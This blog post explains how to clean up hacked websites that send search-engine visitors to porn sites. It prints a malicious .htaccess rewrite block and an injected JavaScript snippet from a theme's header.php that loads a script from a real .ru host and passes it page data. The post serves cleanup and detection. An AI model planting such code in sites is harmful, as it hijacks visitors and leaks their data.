Hackers are getting ridiculous these days, aren’t they? If it’s not one thing, it’s another, and it seems like every site has at least one point of vulnerability. One of the latest issues I’ve seen crop up is that your site may render normally if you type your URL into the address bar, but forwards to pornography or some other malicious site when hit from a search engine.

There are a few potential fixes, but if you run into this you should do a full audit of the files on your website. One hack can be an indication that there’s malicious code elsewhere on your site that you need to take care of.

Anywho, onto the fixes…

1. .htaccess File

The most common incidence of this seems to happen in the .htaccess file. The .htaccess file is used for communicating all sorts of settings to the Apache web server on a site-by-site basis. Rewriting URLs (permalinks) and URL Redirects (301,etc) are some of the most common, and this hack takes advantage of the former. .htaccess is a dot-file, so if you don’t see one in your root directory, make sure you can view hidden files.

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ malicious_redirect_file.php?$1 [L]

See something like the above? Probably not malicious_redirect_file.php?$1, but you get the drift. Delete it, save and re-upload. Instead of directly replacing, I would rename the existing .htaccess to old.htaccess, and upload your pared down version in it’s place. That way, if you screw something else up, you can still reference the old version.

2. JavaScript Injection

This was the occurance that spurred this post. A client using a Premium WordPress theme was informed by one of their customers that their site forwarded to a page with a security alert. Upon checking, it loaded fine for the both of us on desktop, but from mobile we had both been sent to porn sites on random loads. Didn’t happen every time, just once in a while. Now how the hell are you supposed to troubleshoot that?

In steps Redleg’s File Viewer.

Redleg’s File Viewer is a “Free tool to scan a website for malware, malicious redirects, malicious scripts and other bad stuff” and it works great. Enter your domain, hit scan, and give it a few moments.

It quickly returned one piece of code, which I then tracked to the header.php file in the theme.

< script > var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write(' 
< script type="text/javascript" src=hxxp://oszn.kovrov.ru/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://oszn.kovrov.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function (){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x< y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"> < '+'/ script > ');}< / script >

Seems off, yeah? This is hitting a Russian site (.ru domain), to load “jquery.min.php“. jQuery isn’t a PHP library! I deleted that code, re-uploaded, and viola! No more porno redirects.

Have you guys come across similar hacks that don’t apply to either of the above? Let me know in the comments!

Leave a Reply

Your email address will not be published. Required fields are marked *